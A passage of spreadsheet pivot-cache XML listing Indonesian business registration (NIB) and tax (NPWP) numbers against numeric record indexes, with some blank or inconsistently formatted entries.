  <r>
    <x v="1991"/>
    <s v="nib"/>
    <n v="220105111254"/>
  </r>
  <r>
    <x v="1992"/>
    <s v="nib"/>
    <n v="8120215142622"/>
  </r>
  <r>
    <x v="1993"/>
    <s v="nib"/>
    <n v="8120215041982"/>
  </r>
  <r>
    <x v="1994"/>
    <s v="nib"/>
    <n v="8120009793819"/>
  </r>
  <r>
    <x v="557"/>
    <s v="nib"/>
    <n v="220208772639"/>
  </r>
  <r>
    <x v="1937"/>
    <s v="npwp"/>
    <s v="02.299.326.5-518.000"/>
  </r>
  <r>
    <x v="1995"/>
    <s v="nib"/>
    <n v="9120201191115"/>
  </r>
  <r>
    <x v="1996"/>
    <s v="nib"/>
    <n v="8120002960163"/>
  </r>
  <r>
    <x v="1997"/>
    <s v="nib"/>
    <n v="9120017021652"/>
  </r>
  <r>
    <x v="1998"/>
    <s v="nib"/>
    <n v="9120207371193"/>
  </r>
  <r>
    <x v="1988"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1999"/>
    <s v="nib"/>
    <n v="220000170128"/>
  </r>
  <r>
    <x v="2000"/>
    <s v="nib"/>
    <n v="9120303301223"/>
  </r>
  <r>
    <x v="2001"/>
    <s v="nib"/>
    <n v="9120306350954"/>
  </r>
  <r>
    <x v="1991"/>
    <s v="npwp"/>
    <n v="919950790953000"/>
  </r>
  <r>
    <x v="1977"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1985"/>
    <s v="npwp"/>
    <s v="03.280.990.7-041.000"/>
  </r>
  <r>
    <x v="1968"/>
    <s v="npwp"/>
    <s v="02.189.571.9-037.000"/>
  </r>
  <r>
    <x v="1962"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2002"/>
    <s v="nib"/>
    <n v="9120203171273"/>
  </r>
  <r>
    <x v="2002"/>
    <s v="npwp"/>
    <s v="02.938.305.6-603.000"/>
  </r>
  <r>
    <x v="2003"/>
    <s v="nib"/>
    <n v="8120000802571"/>
  </r>
  <r>
    <x v="1995"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2004"/>
    <s v="nib"/>
    <n v="8120219001563"/>
  </r>
  <r>
    <x v="1648"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2005"/>
    <s v="nib"/>
    <n v="8120016270476"/>
  </r>
  <r>
    <x v="1986"/>
    <s v="npwp"/>
    <n v="736590936041000"/>
  </r>
  <r>
    <x v="2005"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1951"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2006"/>
    <s v="nib"/>
    <n v="8120001920549"/>
  </r>
  <r>
    <x v="2006"/>
    <s v="npwp"/>
    <s v="02.009.744.0-604.000"/>
  </r>
  <r>
    <x v="2007"/>
    <s v="nib"/>
    <n v="8120000811308"/>
  </r>
  <r>
    <x v="1992"/>
    <s v="npwp"/>
    <s v="83.945.370.1-041.000"/>
  </r>
  <r>
    <x v="852"/>
    <s v="nib"/>
    <n v="8120003851916"/>
  </r>
  <r>
    <x v="1967"/>
    <s v="npwp"/>
    <s v="91.824.935.0-047.000"/>
  </r>
  <r>
    <x v="2008"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="2009"/>
    <s v="nib"/>
    <n v="9120000370447"/>
  </r>
  <r>
    <x v="578"/>
    <s v="nib"/>
    <n v="8120219001563"/>
  </r>
  <r>
    <x v="2010"/>
    <s v="nib"/>
    <n v="8120219001563"/>
  </r>
  <r>
    <x v="2004"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2011"/>
    <s v="nib"/>
    <n v="8120312042393"/>
  </r>
  <r>
    <x v="2012"/>
    <s v="nib"/>
    <n v="8120014032593"/>
  </r>
  <r>
    <x v="1955"/>
    <s v="npwp"/>
    <s v="91.282.337.4-831.000"/>
  </r>
  <r>
    <x v="2013"/>
    <s v="nib"/>
    <n v="220001152478"/>
  </r>
  <r>
    <x v="1939"/>
    <s v="npwp"/>
    <s v="01.721.208.5-041.000"/>
  </r>
  <r>
    <x v="2014"/>
    <s v="nib"/>
    <n v="9120015053903"/>
  </r>
  <r>
    <x v="1982"/>
    <s v="npwp"/>
    <n v="30460786609000"/>
  </r>
  <r>
    <x v="1946"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1931"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="638"/>
    <s v="nib"/>
    <n v="8120001820471"/>
  </r>
  <r>
    <x v="382"/>
    <s v="nib"/>
    <n v="220103302579"/>
  </r>
  <r>
    <x v="2015"/>
    <s v="nib"/>
    <n v="8120015280138"/>
  </r>
  <r>
    <x v="2015"/>
    <s v="npwp"/>
    <s v="01.061.797.5-058.000"/>
  </r>
  <r>
    <x v="2016"/>
    <s v="nib"/>
    <n v="9120103312651"/>
  </r>
  <r>
    <x v="2017"/>
    <s v="nib"/>
    <n v="9120100202183"/>
  </r>
  <r>
    <x v="2018"/>
    <s v="nib"/>
    <n v="9120012082226"/>
  </r>
  <r>
    <x v="1957"/>
    <s v="npwp"/>
    <s v="84.168.455.8-604.000"/>
  </r>
  <r>
    <x v="2019"/>
    <s v="nib"/>
    <n v="8120015100195"/>
  </r>
  <r>
    <x v="2020"/>
    <s v="nib"/>
    <n v="8120108970759"/>
  </r>
  <r>
    <x v="1989"/>
    <s v="npwp"/>
    <s v="02.830.829.4-041.000"/>
  </r>
  <r>
    <x v="2021"/>
    <s v="nib"/>
    <n v="9120001353008"/>
  </r>
  <r>
    <x v="2022"/>
    <s v="nib"/>
    <n v="8120101841565"/>
  </r>
  <r>
    <x v="2022"/>
    <s v="npwp"/>
    <n v="28174423613000"/>
  </r>
  <r>
    <x v="2023"/>
    <s v="nib"/>
    <n v="8120004872553"/>
  </r>
  <r>
    <x v="2024"/>
    <s v="nib"/>
    <n v="220106192178"/>
  </r>
  <r>
    <x v="2025"/>
    <s v="nib"/>
    <n v="9120003162372"/>
  </r>
  <r>
    <x v="2026"/>
    <s v="nib"/>
    <n v="8120000811308"/>
  </r>
  <r>
    <x v="2027"/>
    <s v="nib"/>
    <n v="8120117142836"/>
  </r>
  <r>
    <x v="1975"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2028"/>
    <s v="npwp"/>
    <s v="86.338.885.6-643.000"/>
  </r>
  <r>
    <x v="2029"/>
    <s v="nib"/>
    <n v="9120019101631"/>
  </r>
  <r>
    <x v="2020"/>
    <s v="npwp"/>
    <s v="Nomor Pokok Wajib Pajak"/>
  </r>
  <r>
    <x v="1999"/>
    <s v="npwp"/>
    <s v="70.720.720.5-047.000"/>
  </r>
  <r>
    <x v="1996"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="672"/>
    <s v="nib"/>
    <n v="8120307870726"/>
  </r>
  <r>
    <x v="2017"/>
    <s v="npwp"/>
    <s v="71.585.177.0.805.000"/>
  </r>
  <r>
    <x v="2019"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="880"/>
    <s v="nib"/>
    <n v="8120004810337"/>
  </r>
  <r>
    <x v="2030"/>
    <s v="nib"/>
    <n v="8120117142836"/>
  </r>
  <r>
    <x v="1979"/>
    <s v="npwp"/>
    <s v="P.1.0000552.17.04"/>
  </r>
  <r>
    <x v="545"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2029"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2031"/>
    <s v="nib"/>
    <n v="9120002160074"/>
  </r>
  <r>
    <x v="2031"/>
    <s v="npwp"/>
    <s v="72.335.782.8-805.000"/>
  </r>
  <r>
    <x v="2032"/>
    <s v="nib"/>
    <n v="9120602741711"/>
  </r>
  <r>
    <x v="2033"/>
    <s v="nib"/>
    <n v="8120008723616"/>
  </r>
  <r>
    <x v="2034"/>
    <s v="npwp"/>
    <s v="80.989.346.4-447.000"/>
  </r>
  <r>
    <x v="2034"/>
    <s v="nib"/>
    <n v="8120201812485"/>
  </r>
  <r>
    <x v="1984"/>
    <s v="npwp"/>
    <s v="86.595.473.9-411.000"/>
  </r>
  <r>
    <x v="1950"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="550"/>
    <s v="nib"/>
    <n v="8120013231117"/>
  </r>
  <r>
    <x v="2035"/>
    <s v="nib"/>
    <n v="9120100572592"/>
  </r>
  <r>
    <x v="2016"/>
    <s v="npwp"/>
    <n v="797099041721000"/>
  </r>
  <r>
    <x v="2013"/>
    <s v="npwp"/>
    <n v="83286385722002"/>
  </r>
  <r>
    <x v="2030"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2036"/>
    <s v="npwp"/>
    <n v="12252029123000"/>
  </r>
  <r>
    <x v="2036"/>
    <s v="nib"/>
    <n v="8120101920359"/>
  </r>
  <r>
    <x v="2009"/>
    <s v="npwp"/>
    <s v="01.762.100.4-215.000"/>
  </r>
  <r>
    <x v="2037"/>
    <s v="nib"/>
    <n v="8120117052432"/>
  </r>
  <r>
    <x v="2038"/>
    <s v="nib"/>
    <n v="9120003782171"/>
  </r>
  <r>
    <x v="2039"/>
    <s v="nib"/>
    <n v="8120001731663"/>
  </r>
  <r>
    <x v="2040"/>
    <s v="nib"/>
    <n v="8120000811308"/>
  </r>
  <r>
    <x v="489"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2041"/>
    <s v="nib"/>
    <n v="220008102021"/>
  </r>
  <r>
    <x v="2042"/>
    <s v="nib"/>
    <n v="220205652157"/>
  </r>
  <r>
    <x v="2043"/>
    <s v="nib"/>
    <n v="220002122645"/>
  </r>
  <r>
    <x v="2028"/>
    <s v="nib"/>
    <n v="9120508880079"/>
  </r>
  <r>
    <x v="2023"/>
    <s v="npwp"/>
    <s v="01.100.476.9-041.001"/>
  </r>
  <r>
    <x v="599"/>
    <s v="nib"/>
    <n v="8120002982202"/>
  </r>
  <r>
    <x v="255"/>
    <s v="nib"/>
    <n v="8120205991786"/>
  </r>
  <r>
    <x v="2032"/>
    <s v="npwp"/>
    <s v="91.381.946.2-047.000"/>
  </r>
  <r>
    <x v="2044"/>
    <s v="nib"/>
    <n v="9120103450529"/>
  </r>
  <r>
    <x v="2037"/>
    <s v="npwp"/>
    <s v="06.089.677.6-119.000"/>
  </r>
  <r>
    <x v="2045"/>
    <s v="nib"/>
    <n v="220102100484"/>
  </r>
  <r>
    <x v="2046"/>
    <s v="nib"/>
    <n v="8120200840182"/>
  </r>
  <r>
    <x v="2047"/>
    <s v="nib"/>
    <n v="8120200840182"/>
  </r>
  <r>
    <x v="2048"/>
    <s v="nib"/>
    <n v="9120102891225"/>
  </r>
  <r>
    <x v="2049"/>
    <s v="nib"/>
    <n v="220209112591"/>
  </r>
  <r>
    <x v="2050"/>
    <s v="nib"/>
    <n v="8120109832893"/>
  </r>
  <r>
    <x v="2051"/>
    <s v="nib"/>
    <n v="9120508880079"/>
  </r>
  <r>
    <x v="2051"/>
    <s v="npwp"/>
    <s v="94.218.261.9-544.000"/>
  </r>
  <r>
    <x v="2050"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="225"/>
    <s v="nib"/>
    <n v="9120306842306"/>
  </r>
  <r>
    <x v="2052"/>
    <s v="nib"/>
    <n v="9120204811139"/>
  </r>
  <r>
    <x v="2053"/>
    <s v="npwp"/>
    <s v="44.716.892.3-545.000"/>
  </r>
  <r>
    <x v="2054"/>
    <s v="nib"/>
    <n v="9120003201915"/>
  </r>
  <r>
    <x v="2033"/>
    <s v="npwp"/>
    <s v="24.272.152.0-115.000"/>
  </r>
  <r>
    <x v="214"/>
    <s v="nib"/>
    <n v="8120315042249"/>
  </r>
  <r>
    <x v="1958"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2055"/>
    <s v="nib"/>
    <n v="9120213011276"/>
  </r>
  <r>
    <x v="2056"/>
    <s v="nib"/>
    <n v="220300162992"/>
  </r>
  <r>
    <x v="2057"/>
    <s v="nib"/>
    <n v="8120200840182"/>
  </r>
  <r>
    <x v="2058"/>
    <s v="nib"/>
    <n v="9120413012641"/>
  </r>
  <r>
    <x v="1983"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2059"/>
    <s v="nib"/>
    <n v="9120003932401"/>
  </r>
  <r>
    <x v="2045"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2060"/>
    <s v="nib"/>
    <n v="9120302252407"/>
  </r>
  <r>
    <x v="2061"/>
    <s v="nib"/>
    <n v="220200280766"/>
  </r>
  <r>
    <x v="2049"/>
    <s v="npwp"/>
    <n v="941821225801000"/>
  </r>
  <r>
    <x v="2038"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2053"/>
    <s v="nib"/>
    <n v="220004240356"/>
  </r>
  <r>
    <x v="2062"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2063"/>
    <s v="nib"/>
    <s v="30.061.46.07794"/>
  </r>
  <r>
    <x v="1971"/>
    <s v="npwp"/>
    <s v="21.068.377.7-041.000"/>
  </r>
  <r>
    <x v="2064"/>
    <s v="nib"/>
    <n v="9120003240896"/>
  </r>
  <r>
    <x v="1970"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2065"/>
    <s v="nib"/>
    <n v="8120109922476"/>
  </r>
  <r>
    <x v="368"/>
    <s v="nib"/>
    <n v="8120104871553"/>
  </r>
  <r>
    <x v="2066"/>
    <s v="nib"/>
    <n v="8120200840182"/>
  </r>
  <r>
    <x v="2056"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="623"/>
    <s v="nib"/>
    <n v="9120006361253"/>
  </r>
  <r>
    <x v="2067"/>
    <s v="nib"/>
    <n v="8120101833713"/>
  </r>
  <r>
    <x v="2068"/>
    <s v="nib"/>
    <n v="9120003240896"/>
  </r>
  <r>
    <x v="2048"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2012"/>
    <s v="npwp"/>
    <s v="81.107.406.1-627.000"/>
  </r>
  <r>
    <x v="2062"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2069"/>
    <s v="nib"/>
    <n v="220200280766"/>
  </r>
  <r>
    <x v="2024"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2024"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2070"/>
    <s v="nib"/>
    <n v="8120117122924"/>
  </r>
  <r>
    <x v="2035"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="529"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2061"/>
    <s v="npwp"/>
    <s v="07.123.144.3-713.001"/>
  </r>
  <r>
    <x v="426"/>
    <s v="nib"/>
    <n v="8120009802176"/>
  </r>
  <r>
    <x v="2071"/>
    <s v="nib"/>
    <n v="9120007552991"/>
  </r>
  <r>
    <x v="2071"/>
    <s v="npwp"/>
    <s v="01.519.308.9-324.000"/>
  </r>
  <r>
    <x v="2047"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2072"/>
    <s v="nib"/>
    <n v="8120115121256"/>
  </r>
  <r>
    <x v="2073"/>
    <s v="nib"/>
    <n v="8120008892019"/>
  </r>
  <r>
    <x v="2070"/>
    <s v="npwp"/>
    <s v="01.535.215.6-507.001"/>
  </r>
  <r>
    <x v="2058"/>
    <s v="npwp"/>
    <s v="93.253.932.3-306.000"/>
  </r>
  <r>
    <x v="2074"/>
    <s v="nib"/>
    <n v="220204281005"/>
  </r>
  <r>
    <x v="632"/>
    <s v="nib"/>
    <n v="8120101833713"/>
  </r>
  <r>
    <x v="470"/>
    <s v="nib"/>
    <n v="220209261811"/>
  </r>
  <r>
    <x v="1994"/>
    <s v="npwp"/>
    <s v="03.060.774.1-112.000"/>
  </r>
  <r>
    <x v="2075"/>
    <s v="nib"/>
    <n v="9120213070779"/>
  </r>
  <r>
    <x v="2076"/>
    <s v="nib"/>
    <n v="220304231506"/>
  </r>
  <r>
    <x v="2077"/>
    <s v="nib"/>
    <n v="1201000120292"/>
  </r>
  <r>
    <x v="26"/>
    <s v="nib"/>
    <n v="9120003441629"/>
  </r>
  <r>
    <x v="2078"/>
    <s v="nib"/>
    <n v="9120403931597"/>
  </r>
  <r>
    <x v="2079"/>
    <s v="nib"/>
    <n v="9120003491309"/>
  </r>
  <r>
    <x v="2080"/>
    <s v="nib"/>
    <n v="9120000183203"/>
  </r>
  <r>
    <x v="2041"/>
    <s v="npwp"/>
    <n v="745985622647000"/>
  </r>
  <r>
    <x v="2081"/>
    <s v="nib"/>
    <n v="220203271148"/>
  </r>
  <r>
    <x v="2082"/>
    <s v="nib"/>
    <n v="9120311122098"/>
  </r>
  <r>
    <x v="531"/>
    <s v="nib"/>
    <n v="220001140868"/>
  </r>
  <r>
    <x v="1002"/>
    <s v="nib"/>
    <n v="8120218140026"/>
  </r>
  <r>
    <x v="2083"/>
    <s v="nib"/>
    <n v="8120116081128"/>
  </r>
  <r>
    <x v="2084"/>
    <s v="nib"/>
    <n v="13456333232"/>
  </r>
  <r>
    <x v="2085"/>
    <s v="nib"/>
    <n v="13456333232"/>
  </r>
  <r>
    <x v="2086"/>
    <s v="nib"/>
    <n v="220106281515"/>
  </r>
  <r>
    <x v="2087"/>
    <s v="nib"/>
    <n v="220106281515"/>
  </r>
  <r>
    <x v="2088"/>
    <s v="nib"/>
    <n v="13456333232"/>
  </r>
  <r>
    <x v="1027"/>
    <s v="nib"/>
    <n v="9120213150563"/>
  </r>
  <r>
    <x v="2082"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2089"/>
    <s v="nib"/>
    <n v="8120006930063"/>
  </r>
  <r>
    <x v="1057"/>
    <s v="nib"/>
    <n v="9120203120096"/>
  </r>
  <r>
    <x v="530"/>
    <s v="nib"/>
    <n v="8120001820245"/>
  </r>
  <r>
    <x v="2090"/>
    <s v="nib"/>
    <n v="8120100951645"/>
  </r>
  <r>
    <x v="2091"/>
    <s v="nib"/>
    <n v="8120001830145"/>
  </r>
  <r>
    <x v="598"/>
    <s v="nib"/>
    <n v="9120302212381"/>
  </r>
  <r>
    <x v="2092"/>
    <s v="nib"/>
    <n v="9120218171259"/>
  </r>
  <r>
    <x v="2093"/>
    <s v="nib"/>
    <n v="8120213260972"/>
  </r>
  <r>
    <x v="2094"/>
    <s v="npwp"/>
    <n v="830449955047000"/>
  </r>
  <r>
    <x v="705"/>
    <s v="nib"/>
    <n v="9120318051371"/>
  </r>
  <r>
    <x v="2095"/>
    <s v="nib"/>
    <n v="8120316091166"/>
  </r>
  <r>
    <x v="2091"/>
    <s v="npwp"/>
    <s v="01.984.622.9-041.000"/>
  </r>
  <r>
    <x v="2094"/>
    <s v="nib"/>
    <n v="9120203261734"/>
  </r>
  <r>
    <x v="2096"/>
    <s v="nib"/>
    <n v="9876512345321"/>
  </r>
  <r>
    <x v="2097"/>
    <s v="nib"/>
    <n v="8120316091166"/>
  </r>
  <r>
    <x v="2077"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2093"/>
    <s v="npwp"/>
    <s v="80.634.541.9-723.000"/>
  </r>
  <r>
    <x v="336"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2068"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="884"/>
    <s v="nib"/>
    <n v="9120105470987"/>
  </r>
  <r>
    <x v="2098"/>
    <s v="nib"/>
    <n v="9120006761426"/>
  </r>
  <r>
    <x v="2099"/>
    <s v="nib"/>
    <n v="9120102261326"/>
  </r>
  <r>
    <x v="2098"/>
    <s v="npwp"/>
    <s v="92.051.307.4-801.000"/>
  </r>
  <r>
    <x v="2083"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="657"/>
    <s v="nib"/>
    <n v="8120000802806"/>
  </r>
  <r>
    <x v="2100"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2101"/>
    <s v="nib"/>
    <n v="8120316091166"/>
  </r>
  <r>
    <x v="2092"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1963"/>
    <s v="npwp"/>
    <n v="817642622503000"/>
  </r>
  <r>
    <x v="2097"/>
    <s v="npwp"/>
    <s v="86.030.191.0-036.000"/>
  </r>
  <r>
    <x v="2102"/>
    <s v="nib"/>
    <n v="9120015021409"/>
  </r>
  <r>
    <x v="2103"/>
    <s v="nib"/>
    <n v="220200250276"/>
  </r>
  <r>
    <x v="2104"/>
    <s v="nib"/>
    <n v="9120002100144"/>
  </r>
  <r>
    <x v="2105"/>
    <s v="nib"/>
    <n v="220004221456"/>
  </r>
  <r>
    <x v="2106"/>
    <s v="nib"/>
    <n v="220204251476"/>
  </r>
  <r>
    <x v="2075"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2107"/>
    <s v="nib"/>
    <n v="220105261073"/>
  </r>
  <r>
    <x v="2108"/>
    <s v="nib"/>
    <n v="220004251549"/>
  </r>
  <r>
    <x v="2108"/>
    <s v="npwp"/>
    <s v="70.895.222.1-543.000"/>
  </r>
  <r>
    <x v="2078"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2109"/>
    <s v="nib"/>
    <n v="8120416121249"/>
  </r>
  <r>
    <x v="2109"/>
    <s v="npwp"/>
    <s v="80.457.569.4-124.000"/>
  </r>
  <r>
    <x v="2100"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2080"/>
    <s v="npwp"/>
    <s v="82.113.724.7-809.001"/>
  </r>
  <r>
    <x v="2105"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2110"/>
    <s v="nib"/>
    <n v="9120108382555"/>
  </r>
  <r>
    <x v="2111"/>
    <s v="nib"/>
    <n v="9120104400694"/>
  </r>
  <r>
    <x v="2112"/>
    <s v="nib"/>
    <n v="8120116132733"/>
  </r>
  <r>
    <x v="2113"/>
    <s v="nib"/>
    <n v="9120109601774"/>
  </r>
  <r>
    <x v="2114"/>
    <s v="nib"/>
    <n v="9120204981963"/>
  </r>
  <r>
    <x v="2115"/>
    <s v="nib"/>
    <n v="8120002781897"/>
  </r>
  <r>
    <x v="2116"/>
    <s v="nib"/>
    <n v="9120001131226"/>
  </r>
  <r>
    <x v="2117"/>
    <s v="nib"/>
    <n v="220102110979"/>
  </r>
  <r>
    <x v="2118"/>
    <s v="nib"/>
    <n v="8120008892019"/>
  </r>
  <r>
    <x v="341"/>
    <s v="nib"/>
    <n v="8120206860214"/>
  </r>
  <r>
    <x v="2119"/>
    <s v="nib"/>
    <n v="8120003840894"/>
  </r>
  <r>
    <x v="2120"/>
    <s v="nib"/>
    <n v="9120107261816"/>
  </r>
  <r>
    <x v="2121"/>
    <s v="nib"/>
    <n v="9120005192434"/>
  </r>
  <r>
    <x v="759"/>
    <s v="nib"/>
    <n v="8120319081767"/>
  </r>
  <r>
    <x v="2122"/>
    <s v="nib"/>
    <n v="9120112051346"/>
  </r>
  <r>
    <x v="2123"/>
    <s v="nib"/>
    <n v="8120014110779"/>
  </r>
  <r>
    <x v="2124"/>
    <s v="nib"/>
    <n v="220009391328"/>
  </r>
  <r>
    <x v="506"/>
    <s v="nib"/>
    <n v="9120008152749"/>
  </r>
  <r>
    <x v="2125"/>
    <s v="nib"/>
    <n v="220008251974"/>
  </r>
  <r>
    <x v="2126"/>
    <s v="nib"/>
    <n v="9120116231734"/>
  </r>
  <r>
    <x v="2127"/>
    <s v="nib"/>
    <n v="8120000880915"/>
  </r>
  <r>
    <x v="2127"/>
    <s v="npwp"/>
    <s v="73.605.634.2‚Äì047.000"/>
  </r>
  <r>
    <x v="2128"/>
    <s v="nib"/>
    <n v="220108162447"/>
  </r>
  <r>
    <x v="2129"/>
    <s v="nib"/>
    <n v="8120002792833"/>
  </r>
  <r>
    <x v="2130"/>
    <s v="nib"/>
    <n v="8120002792833"/>
  </r>
  <r>
    <x v="2114"/>
    <s v="npwp"/>
    <s v="92.809.986.0-804.000"/>
  </r>
  <r>
    <x v="2131"/>
    <s v="nib"/>
    <s v="No NIB 9120317041501"/>
  </r>
  <r>
    <x v="2130"/>
    <s v="npwp"/>
    <s v="21.038.082.0-503.000"/>
  </r>
  <r>
    <x v="2132"/>
    <s v="nib"/>
    <n v="8120112093105"/>
  </r>
  <r>
    <x v="2079"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2110"/>
    <s v="npwp"/>
    <s v="76.040.337.8-822.000"/>
  </r>
  <r>
    <x v="2133"/>
    <s v="nib"/>
    <n v="9120203132742"/>
  </r>
  <r>
    <x v="162"/>
    <s v="nib"/>
    <n v="9120001131226"/>
  </r>
  <r>
    <x v="2011"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2131"/>
    <s v="npwp"/>
    <s v="NO NPWP 92.778.701.0-013.000"/>
  </r>
  <r>
    <x v="2026"/>
    <s v="npwp"/>
    <n v="804624906451000"/>
  </r>
  <r>
    <x v="2125"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2115"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2134"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2134"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="279"/>
    <s v="nib"/>
    <n v="8120112041423"/>
  </r>
  <r>
    <x v="2135"/>
    <s v="nib"/>
    <n v="8120013241583"/>
  </r>
  <r>
    <x v="216"/>
    <s v="nib"/>
    <n v="9120006272829"/>
  </r>
  <r>
    <x v="227"/>
    <s v="nib"/>
    <n v="9120103222223"/>
  </r>
  <r>
    <x v="2089"/>
    <s v="npwp"/>
    <s v="01.510.676.8-641.000"/>
  </r>
  <r>
    <x v="2128"/>
    <s v="npwp"/>
    <n v="766654818801000"/>
  </r>
  <r>
    <x v="2136"/>
    <s v="nib"/>
    <n v="9120008852896"/>
  </r>
  <r>
    <x v="2137"/>
    <s v="nib"/>
    <n v="220000242986"/>
  </r>
  <r>
    <x v="510"/>
    <s v="nib"/>
    <n v="8120201822894"/>
  </r>
  <r>
    <x v="483"/>
    <s v="nib"/>
    <n v="8120216232318"/>
  </r>
  <r>
    <x v="2126"/>
    <s v="npwp"/>
    <n v="936817543047000"/>
  </r>
  <r>
    <x v="366"/>
    <s v="nib"/>
    <n v="8120001950519"/>
  </r>
  <r>
    <x v="583"/>
    <s v="nib"/>
    <n v="8120001702648"/>
  </r>
  <r>
    <x v="2138"/>
    <s v="nib"/>
    <n v="1287000530339"/>
  </r>
  <r>
    <x v="2138"/>
    <s v="npwp"/>
    <s v="02.208.003.0-615.000"/>
  </r>
  <r>
    <x v="791"/>
    <s v="nib"/>
    <n v="8120008981626"/>
  </r>
  <r>
    <x v="2139"/>
    <s v="nib"/>
    <n v="9120008530512"/>
  </r>
  <r>
    <x v="2140"/>
    <s v="nib"/>
    <n v="9120203132742"/>
  </r>
  <r>
    <x v="2141"/>
    <s v="nib"/>
    <n v="9120203132742"/>
  </r>
  <r>
    <x v="563"/>
    <s v="nib"/>
    <n v="9120008530512"/>
  </r>
  <r>
    <x v="2142"/>
    <s v="nib"/>
    <n v="9120305392353"/>
  </r>
  <r>
    <x v="2143"/>
    <s v="nib"/>
    <n v="220301212943"/>
  </r>
  <r>
    <x v="2136"/>
    <s v="npwp"/>
    <s v="92.618.612.3-612.000"/>
  </r>
  <r>
    <x v="2137"/>
    <s v="npwp"/>
    <s v="01.923.391.5-821.000"/>
  </r>
  <r>
    <x v="2144"/>
    <s v="nib"/>
    <n v="9120009390846"/>
  </r>
  <r>
    <x v="2112"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2145"/>
    <s v="nib"/>
    <n v="13456333232"/>
  </r>
  <r>
    <x v="486"/>
    <s v="nib"/>
    <n v="8120016261803"/>
  </r>
  <r>
    <x v="495"/>
    <s v="nib"/>
    <n v="9120204151057"/>
  </r>
  <r>
    <x v="2124"/>
    <s v="npwp"/>
    <s v="84.673.014.1-627.000"/>
  </r>
  <r>
    <x v="2146"/>
    <s v="nib"/>
    <s v="IUMK/471/CA/XI/2018"/>
  </r>
  <r>
    <x v="2147"/>
    <s v="nib"/>
    <n v="8120012142953"/>
  </r>
  <r>
    <x v="756"/>
    <s v="nib"/>
    <n v="9120009422265"/>
  </r>
  <r>
    <x v="2148"/>
    <s v="nib"/>
    <n v="220105231077"/>
  </r>
  <r>
    <x v="2148"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2149"/>
    <s v="nib"/>
    <n v="220204251476"/>
  </r>
  <r>
    <x v="211"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="2102"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2150"/>
    <s v="nib"/>
    <n v="8120108972109"/>
  </r>
  <r>
    <x v="2151"/>
    <s v="nib"/>
    <n v="9120205152985"/>
  </r>
  <r>
    <x v="2152"/>
    <s v="nib"/>
    <n v="220207340748"/>
  </r>
  <r>
    <x v="890"/>
    <s v="nib"/>
    <n v="9120017240543"/>
  </r>
  <r>
    <x v="2152"/>
    <s v="npwp"/>
    <s v="94.371.554.0-915.000"/>
  </r>
  <r>
    <x v="2153"/>
    <s v="nib"/>
    <n v="9120406251018"/>
  </r>
  <r>
    <x v="2153"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2154"/>
    <s v="nib"/>
    <n v="220109241806"/>
  </r>
  <r>
    <x v="353"/>
    <s v="nib"/>
    <n v="8120217052736"/>
  </r>
  <r>
    <x v="2155"/>
    <s v="nib"/>
